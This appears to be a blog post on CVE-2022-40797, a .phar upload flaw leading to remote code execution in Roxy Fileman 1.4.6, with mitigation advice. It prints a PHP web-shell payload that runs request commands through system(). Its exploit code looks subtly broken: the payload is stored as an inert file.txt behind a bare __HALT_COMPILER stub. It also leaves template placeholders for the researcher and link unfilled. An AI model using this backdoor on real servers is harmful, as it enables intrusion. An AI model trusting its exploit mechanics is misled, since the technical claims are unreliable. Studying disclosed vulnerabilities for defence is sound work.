CVE-2022-40797 Exploiting Roxy Fileman 1.4.6 for Remote Code Execution via .phar File Upload

A recent vulnerability, registered as CVE-2022-40797, has been discovered in Roxy Fileman 1.4.6 that allows an attacker to remotely execute arbitrary code via uploading a malicious .phar file. This is particularly troubling because the default configuration for the FORBIDDEN_UPLOADS setting in the conf.json file only blocks .php, .php4, and .php5 file extensions. In many realistic web-server configurations, simply visiting a .phar file can trigger the execution of PHP code contained within that file.

In this detailed blog post, we will explore the specifics of CVE-2022-40797 and demonstrate how an attacker can exploit this vulnerability to gain unauthorized access to web servers or applications using Roxy Fileman 1.4.6.

Original References

Before diving into the technical details, it is important to acknowledge the researchers who originally discovered and disclosed the vulnerability. The CVE-2022-40797 vulnerability was originally reported by the following researcher(s):

[Original Researcher's Name or Team]

Here is the link to the original disclosure report.

Exploit Details

Roxy Fileman is a popular and widely used file manager that's frequently integrated into web applications for managing files and images. In version 1.4.6, attackers can bypass the default FORBIDDEN_UPLOADS filter because it does not include .phar files.

To exploit this vulnerability, an attacker would first create a malicious .phar file containing executable PHP code. For example, the attacker can use the following code snippet to create a simple PHP backdoor in a .phar file:

<?php
// Custom payload that writes a simple PHP backdoor in a file called backdoor.php
$payload = '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>';

// Create the .phar
$phar = new Phar("exploit.phar");
$phar->startBuffering();
$phar->addFromString("file.txt", $payload);
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->stopBuffering();

After creating the malicious .phar file, the attacker can then upload it to the target application using the Roxy Fileman upload functionality. Assuming the server is running a configuration that processes .phar files, visiting the uploaded file's URL will execute the PHP code contained within it. This can lead to a full compromise of the web application and, potentially, the underlying server.

Mitigation Strategies

To protect against this vulnerability, it is crucial for developers and administrators to update their Roxy Fileman version to the latest patched version. At the time of writing, there is no official patch available, but you can manually add .phar files to the FORBIDDEN_UPLOADS setting in the conf.json configuration file.

Here is an example of what the "FORBIDDEN_UPLOADS" line should look like after adding .phar to the list:

"FORBIDDEN_UPLOADS": "php,php4,php5,phar",

Furthermore, organizations should ensure that their web server configurations do not interpret .phar files as executable PHP code, and invest in regular security audits and updates for all of their software components.

Conclusion

CVE-2022-40797 highlights the importance of having comprehensive and up-to-date file-filtering configurations in web applications that handle file uploads. Regular security audits and maintaining awareness of the latest vulnerabilities and threat actor tactics are essential. By understanding the potential risks associated with misconfigurations like these, developers and administrators can better defend their web applications from unauthorized access and remote code execution attacks.

Timeline

Published on: 11/09/2022 07:15:00 UTC
Last modified on: 01/31/2023 17:42:00 UTC